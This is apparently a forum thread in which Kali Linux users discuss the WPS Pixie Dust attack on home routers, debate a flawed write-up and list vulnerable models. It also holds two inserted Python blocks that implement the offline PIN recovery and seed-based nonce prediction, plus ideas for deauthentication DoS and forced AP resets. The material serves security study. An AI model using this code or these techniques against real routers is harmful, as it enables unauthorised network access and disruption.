@nuroo Already checked, completely unavailable; the only way to get it is to dump a live device. Same with the Xfinity Arris routers; I found on a website that the firmware is "closely guarded".
I am trying my best to figure this out. I have been testing on a Broadcom and a ZyXEL router; it never spits out the 2 hashes for them. Am I missing something simple here? Of course you need the 2 hashes to get the PIN. It spits out the other necessary keys/info. My Kali was updated this evening. Edit: I figure it's because the router is not supported.
Last edited by undersc0re; 2015-05-05 at 15:49.
So then, guys & gals....
WPS blackjack attack next?
http://xn--mric-bpa.fr/blog/blackjack.html
All ZTE modems are VULNERABLE to the WPS Pixie Dust attack...
The person who prepared this attack (blackjack) is a bit confused about how things work.
First, RS-1 is a random value generated by the Registrar, and it is different from ES-1.
ES-1 remains unknown.
The generation of the Registrar's R-Hash1 has always been known.
What the author is confused about is PSK1 and the data travelling in the WPS protocol: ES-1 and ES-2 are never sent to the Registrar.
R-Hash1 is generated by the Registrar with PSK1, using a random number RS-1 generated by the Registrar.
A check of R-Hash1 is made by the Enrollee, but using the Enrollee's PSK1; the Enrollee's PSK1 is correct.
Then the Enrollee's R-Hash1 will be different from the Registrar's R-Hash1 because PSK1 is different, and if you have to check all 11,000 possibilities, then you are doing what Reaver does, which is to test all known PINs.
It is not possible to repeat message M4 indefinitely because there is a protocol to be followed; it is necessary to go through M1, M2, M3 and only then send M4, so it is the same thing as Reaver, which is to test all PINs.
Apparently the author was confused about where the keys go and who checks them.
The author's error is here:
"The Enrollee sends the first secret nonce, E-S1. The Register knows if the Enrollee knows the first half of the PIN."
This is done the other way around: the Registrar sends R-S1 and the Enrollee knows if the Registrar knows the first half of the PIN.
Another error in how things work:
"Pixie Dust attack blah blah, we have to pretend that the Register creates predictable random numbers."
The random number is generated in the Registrar, and the Registrar in this case is Kali Linux. How would you generate a random number that you already know? This article has a lot wrong.
Last edited by t6_x; 2015-05-05 at 15:54.
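The hash chain being argued about above (PSK1/PSK2 from the PIN halves, E-Hash1/E-Hash2 and R-Hash1/R-Hash2 from those PSKs plus the secret nonces, none of which ever leave the device that generated them) is easier to follow in code. The block below is an added example; it is not code from this thread, from pixiewps or from Reaver. It derives AuthKey the way the WPS spec does (DHKey = SHA-256 of the DH shared secret, KDK = HMAC-SHA256(DHKey, N1 || MAC_E || N2), AuthKey = first 256 bits of the WPS KDF) and then plays the Pixie Dust offline search: an attacker who acted as the Registrar knows AuthKey, PKE and PKR, and if the Enrollee's E-S1/E-S2 are guessable (the Ralink case of all zeros) it recovers the PIN from E-Hash1/E-Hash2 with at most 10^4 + 10^3 HMACs instead of the online attempts Reaver needs. Assumptions: the Diffie-Hellman exchange itself is not performed; the shared secret, PKE, PKR, nonces and MAC are constructed placeholders, and the function names are mine.

```python
import hashlib
import hmac
import secrets

# Added example (not code from the thread, pixiewps or Reaver): WPS registration
# hash chain plus the Pixie Dust offline PIN search once E-S1/E-S2 are known.
# The DH exchange is NOT performed: shared secret, PKE, PKR, N1, N2 and MAC_E
# below are constructed placeholders of the right sizes (assumption).

WPS_KDF_LABEL = b"Wi-Fi Easy and Secure Key Derivation"


def hmac_sha256(key: bytes, data: bytes) -> bytes:
    return hmac.new(key, data, hashlib.sha256).digest()


def wps_kdf(kdk: bytes, total_bits: int = 640) -> bytes:
    """WPS KDF: concatenate HMAC-SHA256(kdk, i || label || total_bits) for i = 1, 2, ..."""
    out = b""
    i = 1
    while len(out) * 8 < total_bits:
        out += hmac_sha256(kdk, i.to_bytes(4, "big") + WPS_KDF_LABEL + total_bits.to_bytes(4, "big"))
        i += 1
    return out[: total_bits // 8]


def derive_authkey(shared_secret: bytes, n1: bytes, mac_e: bytes, n2: bytes) -> bytes:
    """DHKey = SHA-256(g^(AB) mod p); KDK = HMAC(DHKey, N1 || MAC_E || N2); AuthKey = KDF(KDK)[0:32]."""
    dhkey = hashlib.sha256(shared_secret).digest()
    kdk = hmac_sha256(dhkey, n1 + mac_e + n2)
    return wps_kdf(kdk)[:32]  # next 128 bits: KeyWrapKey, last 256 bits: EMSK


def psk_half(authkey: bytes, pin_digits: str) -> bytes:
    """PSK1 / PSK2: first 128 bits of HMAC-SHA256(AuthKey, ASCII digits of that PIN half)."""
    return hmac_sha256(authkey, pin_digits.encode())[:16]


def wps_hash(authkey: bytes, secret_nonce: bytes, psk: bytes, pke: bytes, pkr: bytes) -> bytes:
    """E-Hash1/2 on the Enrollee, R-Hash1/2 on the Registrar: HMAC(AuthKey, S || PSK || PKE || PKR)."""
    return hmac_sha256(authkey, secret_nonce + psk + pke + pkr)


def wps_checksum_digit(first7: str) -> str:
    """Eighth PIN digit: weights 3,1,3,1,3,1,3 over the first seven digits, mod 10."""
    acc = sum(int(ch) * (3 if idx % 2 == 0 else 1) for idx, ch in enumerate(first7))
    return str((10 - acc % 10) % 10)


def pixie_dust(authkey, ehash1, ehash2, es1, es2, pke, pkr):
    """Offline search: 10^4 candidates for the first half, then 10^3 for the second (digit 8 is a checksum)."""
    first = None
    for i in range(10_000):
        cand = f"{i:04d}"
        if wps_hash(authkey, es1, psk_half(authkey, cand), pke, pkr) == ehash1:
            first = cand
            break
    if first is None:
        return None  # the nonce guess was wrong: every candidate fails
    for j in range(1_000):
        second = f"{j:03d}" + wps_checksum_digit(first + f"{j:03d}")
        if wps_hash(authkey, es2, psk_half(authkey, second), pke, pkr) == ehash2:
            return first + second
    return None


def demo(pin: str = "12345670", weak_enrollee: bool = True):
    """Constructed M1..M3 exchange; returns the PIN the attacker recovers, or None if the nonces are strong."""
    shared_secret = hashlib.sha256(b"constructed g^(AB) mod p").digest() * 6  # 192-byte placeholder
    pke = hashlib.sha256(b"constructed PKE").digest() * 6                      # sent in M1
    pkr = hashlib.sha256(b"constructed PKR").digest() * 6                      # sent in M2
    n1 = bytes.fromhex("00112233445566778899aabbccddeeff")  # Enrollee nonce, public in M1
    n2 = bytes.fromhex("ffeeddccbbaa99887766554433221100")  # Registrar nonce, public in M2
    mac_e = bytes.fromhex("001122334455")
    authkey = derive_authkey(shared_secret, n1, mac_e, n2)

    # Enrollee side. The Ralink/MediaTek failure is E-S1 = E-S2 = 0; a sane device draws them at random.
    if weak_enrollee:
        es1 = es2 = bytes(16)
    else:
        es1, es2 = secrets.token_bytes(16), secrets.token_bytes(16)
    ehash1 = wps_hash(authkey, es1, psk_half(authkey, pin[:4]), pke, pkr)
    ehash2 = wps_hash(authkey, es2, psk_half(authkey, pin[4:]), pke, pkr)

    # M3 carries E-Hash1/E-Hash2 only; E-S1/E-S2 are never transmitted. The attacker (acting as
    # Registrar) knows AuthKey, PKE, PKR and guesses the nonces as all zeros.
    return pixie_dust(authkey, ehash1, ehash2, bytes(16), bytes(16), pke, pkr)


if __name__ == "__main__":
    print("weak enrollee ->", demo())
    print("random nonces ->", demo(weak_enrollee=False))
```

With random E-S1/E-S2 the same search fails on every one of the 10^4 first-half candidates, which is exactly t6_x's point: nothing in M3 lets you test a PIN half without the matching secret nonce, and the only way to test one per exchange is the online M4 round trip that Reaver already does.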
... and according to my Jedi skills there are no "gals" here. If there are, please someone introduce me!
Welcome some1, to the new Kali Kitchen (thanks g0tmilk), where strange things are cooked and weird things happen. Cheers!!!
Kali Linux USB Installation using LinuxLive USB Creator
Howto Install HDD Kali on a USB Key
Clean your laptop fan | basic knowledge
Haha, I love that ^^ Anyways, I need some help from some of you really smart, experienced guys out there. I still have a lot of homework to do on the topic, but I was looking into tkiptun-ng... more specifically injecting "arbitrary packets." Does anyone know what kind of stuff we can inject? I'm wondering if we can somehow, maybe magically with a little bit of "pixie dust", initialize PBC or something similar? I'm really not sure, just thinking.
The author knows he was wrong; right at the top of the page it says:
Erratum: I thought the Enrollee was the client, and the Registrar the AP (see spec:
Enrollee: A Device seeking to join a WLAN Domain. Once an Enrollee obtains a valid credential, it becomes a Member.
Registrar: An entity with the authority to issue and revoke Domain Credentials. A Registrar may be integrated into an AP, or it may be separate from the AP. A Registrar may not have WLAN capability. A given Domain may have multiple Registrars.
), but I was wrong. Thus, what I wrote below contains errors. Correction and implementation are left as an exercise to the reader.
Love that we have our own little "kitchen" now
So anyways, is anyone familiar with tkiptun-ng and packetforge-ng?
Like sending it malformed packets and making it trigger a PBC? That's an interesting idea. I remember a while ago I was doing some packet manipulation scripting and I found scapy to be VERY useful for the project I was doing. It would probably be a good tool to use for that.
You took the words right out of my mouth; that's exactly what I was thinking. I actually had 3 ideas.
1: Trigger PBC
2: Trigger AP to accept a client's WPS pin
3: Send an M8 packet to attempt to reconfigure the AP
I'm not so sure that any of these ideas will work since I'm no super hacker or programmer, but it is just something I see as possible.
Also, there have been updates to tkiptun-ng: http://download.aircrack-ng.org/wiki...kip_master.pdf
Last edited by soxrok2212; 2015-05-05 at 21:10.
Hrm, that gave me an idea. I can hook up to a router (UART, SPI sniffing, or whatever) and see what goes on inside the router during a WPS transaction. See if there is anything exploitable.
Yeah, a reset would be excellent. I've been trying a bunch of ways but haven't been successful. I've been thinking about probing an AP hundreds of times per second with invalid characters in order to reset it... haven't been able to try that yet (MDK3 doesn't support this operation... yet).
Never a dull moment..
If the knoppix-std forum were still up, I could direct you to the script I wrote that used scapy. It wasn't much; it just watched an AP and dynamically disassoc/deauthed any clients that tried to connect to the AP that weren't on the "whitelist", sort of an active AP protection. Wish I still had a copy of it so I could see how I did it :-/
Oh well, off to do my favorite thing, hardware hacking!
If I come up with anything useful, I'll start a new thread to hopefully get some R&D into it :-D
Nope, it was a straight-up DoS. It could be set up to protect an AP from any unknown clients, or set up to deny a specified client (or clients) from assoc/auth to any AP I could see.
More or less it was just used to either protect an AP, or just troll someone ;-)
Last edited by aanarchyy; 2015-05-05 at 23:50.
Ah, interesting. Well, there are really 3 things on my mind right now.
1: Have t6_x's Reaver print PKE, PKR and all that stuff with -vvv (as well as when sending M1, M2, etc.). I've already contacted him about that; hopefully we will see it soon.
2: Get someone who knows C (or who can modify MDK3) to try to probe an AP with invalid SSID characters to try to reset/reboot the AP.
3: Figure out how to forge a packet that could possibly open up an opportunity for one (or more) of the 3 things I listed earlier on APs configured with WPA+TKIP or WPA+WPA2 TKIP+CCMP.
That's basically my agenda... if anyone wants to assist me, that would be great.
Last edited by soxrok2212; 2015-05-06 at 02:49.
As said earlier, it's probably best to open a new thread about this, as it is not really Pixie related. Put all your ideas in the OP and everyone can collectively (hopefully) make something of it.
But for now, I'm still poking at this effin' router to make it do something interesting D-:<
Last edited by aanarchyy; 2015-05-06 at 00:04.
Just a quick note on the original post: DH keys are not calculated with a PRNG; it's modular arithmetic with the function described below... I updated that. Sorry for the confusion.
I also forgot to note: MediaTek is vulnerable too! Same problem as Ralink (since MediaTek took over Ralink a few years ago).
Hey #soxrok2212... Thanks for pixiewps 1.1... it works on the TD5130 V1 but not on the TD5130 V3. Why?
OK, I will send you a handshake for the TD5130 V3... OK? For adding this Realtek to pixiewps and reaver.
Give me your Gmail, please.
It keeps looping :S
A router is vulnerable to Pixiewps if ES1=ES2... if not, invulnerable... You can look at all the results...
Some manufacturers use really easy ways to create the PIN... serial numbers, ad hoc or other...
They could create new -K options like -K 4, -K 5, -K 6 or -W 3, -W 4...
Pixiewps is a great project... user friendly, customer friendly.....
I just checked the database and no Broadcom units are vulnerable. I was sure someone posted that only some Broadcoms are. Have there been any such cases?
#Saydamination, yes, but I have a handshake.cap... I will send it to #soxrok2212... just give me your email, please.
TRENDnet TEW-691GR - VULNERABLE
Pixie:
[+] Manufacturer: TRENDnet Technology, Corp.
[+] Model Name: TRENDnet Router
[+] Model Number: TEW-691GR
[+] Serial: 12345678
Chipset: Ralink RT3883
wikidevi
I added some thoughts about Atheros. Potentially the same thing goes for Broadcom... anyone have any ideas or comments?
@wn722
I'm glad you asked. I had the same question. Didn't realize the main page had updated.
@soxrok2212
I'll help test if you guys come up with something.
Cheers. Good on Atheros for keeping it safe.
Why not use untwister to brute-force the original seed and find the PIN?
It's available on GitHub; it's a seed "recovery" tool.
The reason is that the unsupported routers use /dev/urandom to generate the random numbers.
Untwister only supports the basic PRNGs of certain libraries (glibc's, Mersenne Twister, PHP's MT variant, Ruby's). These are simple and easy-to-crack PRNGs.
But the unsupported routers use /dev/urandom, which is safer, and it is complicated to manage to find the seed.
As far as I can tell, only Atheros uses /dev/random. Also, Dominique Bongard clearly stated that these seeds could be found in seconds with a decent computer. Which algorithm the PRNG uses isn't stated anywhere, as far as I have read.
Also, Dominique pointed out that the seed was very low entropy, only 32 bits!! It's nothing impossible to crack in minutes with any home computer. The only reason we can't is because someone hasn't figured out how to write the code yet. Everything is literally written down for us in Bongard's presentation... literally... The only reason we're able to get the PIN now is because we assume ES-1 = ES-2 = 0, which really isn't much "hacking". The only problem we are facing now is that someone needs to know how to write code to find the state of the PRNG; once that's found, we generate random numbers, hash the result with HMAC-SHA256, and then simply compare the results to what the router gave us. Once we see they are the same, we know we have the correct seed, and from that we can find ES-1 and ES-2 (I'm using Broadcom as an example since it generates both nonces right after the M1 message). This is by far the simplest thing; I'm honestly very surprised Broadcom hasn't been cracked yet. It's really not that complicated. Let's not forget Dominique Bongard was able to pwn every router out there, even Atheros with their "hard to crack" /dev/random PRNG.
Where did you hear he could crack any router? I've been talking a lot with him and he has said that Atheros looked pretty secure. The thing with /dev/random is that it has external sources of entropy that get increasingly more difficult to crack. It's not just "find the seed and we're done"; it's a whole lot more complicated than that.
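The seed-recovery idea in the two posts above rests on one property: the public Enrollee nonce N1 (sent in M1) and the secret nonces E-S1/E-S2 come out of the same small-state generator, so whoever can reproduce the generator stream from N1 gets E-S1 and E-S2 for free and can then run the usual offline PIN search. The block below is an added example and not code from this thread, from pixiewps or from untwister; it models that property with a hypothetical 32-bit linear congruential generator (the constants are the textbook ANSI C example values, chosen for illustration, and say nothing about what any real Broadcom or other vendor firmware does). To keep the pure-Python brute force to about a second, the seed space is cut to 20 bits; a C implementation would sweep the full 2^32 the way the poster describes. Function and class names are mine.

```python
# Added example (not thread code, not pixiewps, not untwister): recover a weak
# PRNG state from the public Enrollee nonce N1 and replay it to obtain the secret
# nonces E-S1/E-S2 that otherwise never leave the Enrollee.
# ToyLcg is a HYPOTHETICAL stand-in for a vendor generator; the constants are the
# classic ANSI C example LCG values. SEED_BITS is cut to 20 (assumption, for speed)
# where the thread talks about a 32-bit seed.

LCG_A, LCG_C, MASK32 = 1103515245, 12345, 0xFFFFFFFF
SEED_BITS = 20


class ToyLcg:
    """32-bit LCG exposing only the top 16 bits of each state, as many rand() clones do."""

    def __init__(self, seed: int):
        self.state = seed & MASK32

    def next_u16(self) -> int:
        self.state = (LCG_A * self.state + LCG_C) & MASK32
        return self.state >> 16

    def nonce16(self) -> bytes:
        # A 128-bit WPS nonce = eight consecutive 16-bit outputs, big-endian.
        return b"".join(self.next_u16().to_bytes(2, "big") for _ in range(8))


def enrollee_nonces(seed: int):
    """Model of the flawed Enrollee: N1, then E-S1, then E-S2 drawn from one generator stream."""
    g = ToyLcg(seed)
    return g.nonce16(), g.nonce16(), g.nonce16()


def recover_seed(n1: bytes, seed_bits: int = SEED_BITS):
    """Brute-force the seed whose first eight outputs reproduce the observed N1."""
    first_word = int.from_bytes(n1[:2], "big")
    for seed in range(1 << seed_bits):
        # Cheap 16-bit filter: only ~1 in 65536 seeds survive to the full comparison.
        if (((LCG_A * seed + LCG_C) & MASK32) >> 16) != first_word:
            continue
        if ToyLcg(seed).nonce16() == n1:
            return seed
    return None


def recover_secret_nonces(n1: bytes, seed_bits: int = SEED_BITS):
    """Given N1 from M1, return (E-S1, E-S2) the Enrollee will use, or None if no seed matches."""
    seed = recover_seed(n1, seed_bits)
    if seed is None:
        return None
    g = ToyLcg(seed)
    g.nonce16()  # skip N1, which the attacker already saw
    return g.nonce16(), g.nonce16()


def demo(seed: int = 0x3A5F1) -> bool:
    """Constructed run: the attacker sees only N1 and must reproduce E-S1/E-S2."""
    n1, es1, es2 = enrollee_nonces(seed)
    return recover_secret_nonces(n1) == (es1, es2)


if __name__ == "__main__":
    n1, es1, es2 = enrollee_nonces(0x3A5F1)
    print("N1   :", n1.hex())
    print("seed :", hex(recover_seed(n1)))
    print("E-S1 :", es1.hex(), "E-S2:", es2.hex(), "recovered:", demo())
```

The recovered E-S1/E-S2 then replace the all-zero guess in the Pixie Dust search; that part of the job is what pixiewps already does. The thing this model leaves out is exactly soxrok2212's objection: a generator that is reseeded from hardware entropy between N1 and E-S1 (the /dev/random case) has no single state to recover, and N1 then tells you nothing about the secret nonces.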
Interesting reading on this thread.....
Here's another router
Linksys WRT110
Vulnerable
[P] WPS Manufacturer: Linksys Inc.
[P] WPS Model Name: Linksys Wireless Router
[P] WPS Model Number: WRT110
[P] Access Point Serial Number: 12345678
CPU1: Ralink RT2780
wikidevi
Hello and thanks for the info.
The following router is vulnerable:
https://wikidevi.com/wiki/Buffalo_WBMR-HP-GN
[P] WPS Manufacturer: BUFFALO INC.
[P] WPS Model Name: WBMR-HP-GN
[P] WPS Model Number: RT2860
[P] Access Point Serial Number: 12345678